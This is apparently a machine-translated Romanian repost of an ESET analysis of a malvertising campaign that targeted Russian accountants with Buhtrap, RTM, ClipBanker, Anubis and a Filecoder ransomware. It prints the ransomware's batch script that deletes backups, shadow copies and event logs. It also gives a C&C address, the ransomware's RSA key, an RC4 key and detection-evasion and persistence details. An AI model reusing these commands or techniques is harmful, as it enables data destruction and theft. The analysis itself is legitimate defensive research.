Pentru a viza contabilii într-un atac cibernetic, puteți folosi documentele de lucru pe care le caută online. Aproximativ acest lucru a făcut un grup cibernetic în ultimele luni, distribuind ușile din spate cunoscute. и , precum și criptoare și software pentru furtul de criptomonede. Cele mai multe ținte sunt situate în Rusia. Atacul a fost efectuat prin plasarea de reclame rău intenționate pe Yandex.Direct. Potențialele victime au fost direcționate către un site web de unde li s-a cerut să descarce un fișier rău intenționat deghizat ca un șablon de document. Yandex a eliminat reclamele rău intenționate după avertismentul nostru.
Codul sursă al lui Buhtrap a fost difuzat online în trecut, astfel încât oricine îl poate folosi. Nu avem informații despre disponibilitatea codului RTM.
În această postare vă vom spune cum atacatorii au distribuit malware folosind Yandex.Direct și l-au găzduit pe GitHub. Postarea se va încheia cu o analiză tehnică a malware-ului.
Buhtrap și RTM revin în afaceri
Mecanism de răspândire și victime
Diferitele sarcini utile livrate victimelor au un mecanism comun de propagare. Toate fișierele rău intenționate create de atacatori au fost plasate în două depozite GitHub diferite.
De obicei, depozitul conținea un fișier rău intenționat descărcabil, care se schimba frecvent. Deoarece GitHub vă permite să vizualizați istoricul modificărilor aduse unui depozit, putem vedea ce malware a fost distribuit într-o anumită perioadă. Pentru a convinge victima să descarce fișierul rău intenționat, a fost folosit site-ul web Blanki-shabloni24[.]ru, prezentat în figura de mai sus.
Designul site-ului și toate denumirile fișierelor rău intenționate urmează un singur concept - formulare, șabloane, contracte, mostre etc. Având în vedere că software-ul Buhtrap și RTM au fost deja folosite în atacuri asupra contabililor în trecut, am presupus că strategia în noua campanie este aceeași. Singura întrebare este cum a ajuns victima pe site-ul atacatorilor.
infecție
Cel puțin câteva potențiale victime care au ajuns pe acest site au fost atrase de reclamele rău intenționate. Mai jos este un exemplu de adresă URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
După cum puteți vedea din link, bannerul a fost postat pe forumul de contabilitate legitim bb.f2[.]kz. Este important de remarcat faptul că bannerele au apărut pe site-uri diferite, toate aveau același id de campanie (blanki_rsya) și majoritatea erau legate de servicii de contabilitate sau asistență juridică. Adresa URL arată că victima potențială a folosit cererea „descărcați formularul de factură”, care susține ipoteza noastră privind atacurile vizate. Mai jos sunt site-urile pe care au apărut bannerele și interogările de căutare corespunzătoare.
- descărcați formularul de factură – bb.f2[.]kz
- model contract - Ipopen[.]ru
- eșantion de reclamație aplicație - 77metrov[.]ru
- formular de acord - blank-dogovor-kupli-prodazhi[.]ru
- exemplu de cerere de judecată - zen.yandex[.]ru
- eșantion de reclamație - yurday[.]ru
- model de formulare de contract – Regforum[.]ru
- formular contract – assistentus[.]ru
- exemplu de acord de apartament – napravah[.]com
- mostre de contracte legale - avito[.]ru
Este posibil ca site-ul blanki-shabloni24[.]ru să fi fost configurat pentru a trece o evaluare vizuală simplă. De obicei, un anunț care indică un site cu aspect profesional cu un link către GitHub nu pare a fi ceva evident rău. În plus, atacatorii au încărcat fișiere rău intenționate în depozit doar pentru o perioadă limitată, probabil în timpul campaniei. De cele mai multe ori, depozitul GitHub conținea o arhivă zip goală sau un fișier EXE gol. Astfel, atacatorii ar putea distribui reclame prin Yandex.Direct pe site-uri care au fost cel mai probabil vizitate de contabili care au venit ca răspuns la anumite interogări de căutare.
În continuare, să ne uităm la diferitele sarcini utile distribuite în acest fel.
Analiza sarcinii utile
Cronologia distribuției
Campania rău intenționată a început la sfârșitul lunii octombrie 2018 și este activă la momentul redactării acestui articol. Deoarece întregul depozit era disponibil public pe GitHub, am compilat o cronologie exactă a distribuției a șase familii diferite de malware (a se vedea figura de mai jos). Am adăugat o linie care arată când a fost descoperit linkul bannerului, măsurat prin telemetria ESET, pentru comparație cu istoricul git. După cum puteți vedea, acest lucru se corelează bine cu disponibilitatea încărcăturii utile pe GitHub. Discrepanța de la sfârșitul lunii februarie poate fi explicată prin faptul că nu am avut o parte din istoricul modificărilor, deoarece depozitul a fost eliminat din GitHub înainte de a-l putea obține în întregime.
Figura 1. Cronologia distribuției programelor malware.
Certificate de semnare a codului
Campania a folosit mai multe certificate. Unele au fost semnate de mai mult de o familie de malware, ceea ce indică în continuare că diferite mostre aparțineau aceleiași campanii. În ciuda disponibilității cheii private, operatorii nu au semnat în mod sistematic binarele și nu au folosit cheia pentru toate mostrele. La sfârșitul lunii februarie 2019, atacatorii au început să creeze semnături nevalide folosind un certificat deținut de Google pentru care nu aveau cheia privată.
Toate certificatele implicate în campanie și familiile de programe malware pe care le semnează sunt enumerate în tabelul de mai jos.
De asemenea, am folosit aceste certificate de semnare a codului pentru a stabili legături cu alte familii de programe malware. Pentru majoritatea certificatelor, nu am găsit mostre care nu au fost distribuite printr-un depozit GitHub. Cu toate acestea, certificatul TOV „MARIYA” a fost folosit pentru a semna programe malware aparținând rețelei bot , adware și mineri. Este puțin probabil ca acest malware să aibă legătură cu această campanie. Cel mai probabil, certificatul a fost achiziționat de pe darknet.
Win32/Filecoder.Buhtrap
Prima componentă care ne-a atras atenția a fost nou descoperitul Win32/Filecoder.Buhtrap. Acesta este un fișier binar Delphi care este uneori împachetat. A fost distribuit în principal în februarie-martie 2019. Se comportă așa cum se cuvine unui program ransomware - caută unități locale și foldere de rețea și criptează fișierele pe care le găsește. Nu are nevoie de o conexiune la Internet pentru a fi compromisă deoarece nu contactează serverul pentru a trimite chei de criptare. În schimb, adaugă un „token” la sfârșitul mesajului de răscumpărare și sugerează utilizarea e-mailului sau Bitmessage pentru a contacta operatorii.
Pentru a cripta cât mai multe resurse sensibile posibil, Filecoder.Buhtrap rulează un fir de execuție conceput pentru a închide software-ul cheie care ar putea avea manipulatoare de fișiere deschise care conțin informații valoroase care ar putea interfera cu criptarea. Procesele țintă sunt în principal sisteme de management al bazelor de date (DBMS). În plus, Filecoder.Buhtrap șterge fișierele jurnal și copiile de rezervă pentru a îngreuna recuperarea datelor. Pentru a face acest lucru, rulați scriptul batch de mai jos.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap folosește un serviciu online legitim IP Logger, conceput pentru a colecta informații despre vizitatorii site-ului. Acesta este destinat să urmărească victimele ransomware-ului, care este responsabilitatea liniei de comandă:
mshta.exe "javascript:document.write('');"
Fișierele pentru criptare sunt selectate dacă nu se potrivesc cu trei liste de excludere. În primul rând, fișierele cu următoarele extensii nu sunt criptate: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys și .băţ. În al doilea rând, sunt excluse toate fișierele pentru care calea completă conține șiruri de director din lista de mai jos.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
În al treilea rând, anumite nume de fișiere sunt, de asemenea, excluse de la criptare, printre care și numele de fișier al mesajului de răscumpărare. Lista este prezentată mai jos. În mod evident, toate aceste excepții sunt menite să mențină mașina în funcțiune, dar cu o rezistență tehnică minimă.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Schema de criptare a fișierelor
Odată executat, malware-ul generează o pereche de chei RSA de 512 biți. Exponentul privat (d) și modulul (n) sunt apoi criptate cu o cheie publică de 2048 de biți (exponent public și modul), împachetate cu zlib și codificate în bază64. Codul responsabil pentru acest lucru este prezentat în Figura 2.
Figura 2. Rezultatul decompilării Hex-Rays a procesului de generare a perechii de chei RSA pe 512 biți.
Mai jos este un exemplu de text simplu cu o cheie privată generată, care este un simbol atașat mesajului de răscumpărare.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Cheia publică a atacatorilor este dată mai jos.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Fișierele sunt criptate folosind AES-128-CBC cu o cheie de 256 de biți. Pentru fiecare fișier criptat, sunt generate o nouă cheie și un nou vector de inițializare. Informațiile cheie sunt adăugate la sfârșitul fișierului criptat. Să luăm în considerare formatul fișierului criptat.
Fișierele criptate au următorul antet:
Datele fișierului sursă cu adăugarea valorii magice VEGA sunt criptate la primii 0x5000 de octeți. Toate informațiile de decriptare sunt atașate la un fișier cu următoarea structură:
- Marcatorul pentru dimensiunea fișierului conține un marcaj care indică dacă dimensiunea fișierului este mai mare de 0x5000 de octeți
— blob cheie AES = ZlibCompress(RSAEncrypt(cheie AES + IV, cheia publică a perechii de chei RSA generată))
- blob cheie RSA = ZlibCompress(RSAEncrypt (cheie privată RSA generată, cheie publică RSA codificată))
Win32/ClipBanker
Win32/ClipBanker este o componentă care a fost distribuită intermitent de la sfârșitul lunii octombrie până la începutul lunii decembrie 2018. Rolul său este de a monitoriza conținutul clipboard-ului, caută adrese ale portofelelor criptomonede. După ce a determinat adresa țintă a portofelului, ClipBanker o înlocuiește cu o adresă despre care se crede că aparține operatorilor. Probele pe care le-am examinat nu au fost nici în cutie, nici ofuscate. Singurul mecanism folosit pentru a masca comportamentul este criptarea șirurilor. Adresele portofelului operatorului sunt criptate folosind RC4. Criptomonedele țintă sunt Bitcoin, Bitcoin cash, Dogecoin, Ethereum și Ripple.
În perioada în care malware-ul s-a răspândit în portofelele Bitcoin ale atacatorilor, o sumă mică a fost trimisă către VTS, ceea ce pune la îndoială succesul campaniei. În plus, nu există dovezi care să sugereze că aceste tranzacții au fost deloc legate de ClipBanker.
Win32/RTM
Componenta Win32/RTM a fost distribuită timp de câteva zile la începutul lunii martie 2019. RTM este un bancher troian scris în Delphi, destinat sistemelor bancare de la distanță. În 2017, cercetătorii ESET au publicat a acestui program, descrierea este încă relevantă. În ianuarie 2019, a lansat și Palo Alto Networks .
Încărcător Buhtrap
De ceva timp, pe GitHub a fost disponibil un program de descărcare care nu era similar cu instrumentele Buhtrap anterioare. Se întoarce spre https://94.100.18[.]67/RSS.php?<some_id> pentru a obține etapa următoare și o încarcă direct în memorie. Putem distinge două comportamente ale codului din a doua etapă. În prima adresă URL, RSS.php a trecut direct ușa din spate Buhtrap - această ușă din spate este foarte asemănătoare cu cea disponibilă după scurgerea codului sursă.
Interesant este că vedem mai multe campanii cu ușa din spate Buhtrap și se presupune că sunt conduse de diferiți operatori. În acest caz, principala diferență este că ușa din spate este încărcată direct în memorie și nu folosește schema obișnuită cu procesul de implementare a DLL despre care am vorbit . În plus, operatorii au schimbat cheia RC4 folosită pentru a cripta traficul de rețea către serverul C&C. În majoritatea campaniilor pe care le-am văzut, operatorii nu s-au deranjat să schimbe această cheie.
Al doilea comportament, mai complex, a fost că URL-ul RSS.php a fost transmis către un alt încărcător. A implementat un fel de ofuscare, cum ar fi reconstruirea tabelului de import dinamic. Scopul bootloader-ului este de a contacta serverul C&C [.]com/api/F27F84EDA4D13B15/2, trimiteți jurnalele și așteptați un răspuns. Procesează răspunsul ca un blob, îl încarcă în memorie și îl execută. Sarcina utilă pe care am văzut-o executând acest încărcător a fost aceeași ușă din spate Buhtrap, dar pot exista și alte componente.
Android/Spy.Banker
Interesant este că o componentă pentru Android a fost găsită și în depozitul GitHub. A fost în filiala principală doar o zi - 1 noiembrie 2018. În afară de faptul că este postat pe GitHub, telemetria ESET nu găsește nicio dovadă că acest malware este distribuit.
Componenta a fost găzduită ca un pachet de aplicații Android (APK). Este foarte obscurcat. Comportamentul rău intenționat este ascuns într-un JAR criptat situat în APK. Este criptat cu RC4 folosind această cheie:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Aceeași cheie și algoritm sunt folosite pentru a cripta șirurile. JAR este situat în APK_ROOT + image/files. Primii 4 octeți ai fișierului conțin lungimea JAR-ului criptat, care începe imediat după câmpul de lungime.
După ce am decriptat fișierul, am descoperit că era Anubis - anterior banker pentru Android. Programul malware are următoarele caracteristici:
- înregistrare cu microfon
- făcând capturi de ecran
- obținerea coordonatelor GPS
- keylogger
- criptarea datelor dispozitivului și cererea de răscumpărare
- trimiterea de spam
Interesant este că bancherul a folosit Twitter ca canal de comunicare de rezervă pentru a obține un alt server C&C. Eșantionul pe care l-am analizat a folosit contul @JonesTrader, dar la momentul analizei acesta era deja blocat.
Bankerul conține o listă de aplicații țintă pe dispozitivul Android. Este mai lungă decât lista obținută în studiul Sophos. Lista include multe aplicații bancare, programe de cumpărături online precum Amazon și eBay și servicii de criptomonedă.
MSIL/ClipBanker.IH
Ultima componentă distribuită în cadrul acestei campanii a fost executabilul .NET Windows, care a apărut în martie 2019. Majoritatea versiunilor studiate au fost împachetate cu ConfuserEx v1.0.0. La fel ca ClipBanker, această componentă folosește clipboard-ul. Scopul său este o gamă largă de criptomonede, precum și oferte pe Steam. În plus, el folosește serviciul IP Logger pentru a fura cheia WIF privată Bitcoin.
Mecanisme de protecție
Pe lângă beneficiile pe care ConfuserEx le oferă în prevenirea depanării, dumpingului și falsificării, componenta include capacitatea de a detecta produse antivirus și mașini virtuale.
Pentru a verifica dacă rulează într-o mașină virtuală, malware-ul folosește linia de comandă WMI (WMIC) Windows încorporată pentru a solicita informații BIOS, și anume:
wmic bios
Apoi programul analizează rezultatul comenzii și caută cuvinte cheie: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Pentru a detecta produsele antivirus, malware trimite o solicitare Windows Management Instrumentation (WMI) la Centrul de securitate Windows folosind ManagementObjectSearcher API așa cum se arată mai jos. După decodare din base64, apelul arată astfel:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figura 3. Procesul de identificare a produselor antivirus.
În plus, malware-ul verifică dacă , un instrument pentru a proteja împotriva atacurilor clipboard și, dacă rulează, suspendă toate firele din acel proces, dezactivând astfel protecția.
Persistenţă
Versiunea de malware pe care am studiat-o se autocopiază %APPDATA%googleupdater.exe și setează atributul „ascuns” pentru directorul Google. Apoi ea schimbă valoarea SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell în registrul Windows și adaugă calea updater.exe. În acest fel, malware-ul va fi executat de fiecare dată când utilizatorul se conectează.
Comportament rău intenționat
La fel ca ClipBanker, malware-ul monitorizează conținutul clipboard-ului și caută adrese de portofel de criptomonede și, atunci când este găsit, îl înlocuiește cu una dintre adresele operatorului. Mai jos este o listă de adrese țintă bazată pe ceea ce se găsește în cod.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Pentru fiecare tip de adresă există o expresie regulată corespunzătoare. Valoarea STEAM_URL este folosită pentru a ataca sistemul Steam, așa cum se poate vedea din expresia regulată care este folosită pentru a defini în buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Canal de exfiltrare
Pe lângă înlocuirea adreselor din buffer, malware-ul vizează cheile WIF private ale portofelelor Bitcoin, Bitcoin Core și Electrum Bitcoin. Programul folosește plogger.org ca canal de exfiltrare pentru a obține cheia privată WIF. Pentru a face acest lucru, operatorii adaugă date de cheie privată la antetul HTTP User-Agent, așa cum se arată mai jos.
Figura 4. Consola IP Logger cu date de ieșire.
Operatorii nu au folosit iplogger.org pentru a exfiltra portofele. Probabil că au recurs la o metodă diferită din cauza limitei de 255 de caractere din câmp User-Agentafișat în interfața web IP Logger. În mostrele pe care le-am studiat, celălalt server de ieșire a fost stocat în variabila de mediu DiscordWebHook. În mod surprinzător, această variabilă de mediu nu este atribuită nicăieri în cod. Acest lucru sugerează că malware-ul este încă în curs de dezvoltare și variabila este atribuită mașinii de testare a operatorului.
Există un alt semn că programul este în dezvoltare. Fișierul binar include două adrese URL iplogger.org și ambele sunt interogate atunci când datele sunt exfiltrate. Într-o solicitare către una dintre aceste adrese URL, valoarea din câmpul Referer este precedată de „DEV /”. De asemenea, am găsit o versiune care nu a fost ambalată folosind ConfuserEx, destinatarul acestei adrese URL se numește DevFeedbackUrl. Pe baza numelui variabilei de mediu, credem că operatorii intenționează să folosească serviciul legitim Discord și sistemul său de interceptare web pentru a fura portofelele criptomonede.
Concluzie
Această campanie este un exemplu de utilizare a serviciilor de publicitate legitime în atacurile cibernetice. Schema vizează organizații rusești, dar nu am fi surprinși să vedem un astfel de atac folosind servicii non-rusești. Pentru a evita compromisurile, utilizatorii trebuie să aibă încredere în reputația sursei software-ului pe care îl descarcă.
O listă completă a indicatorilor de compromis și a atributelor MITRE ATT&CK este disponibilă la .
Sursa: www.habr.com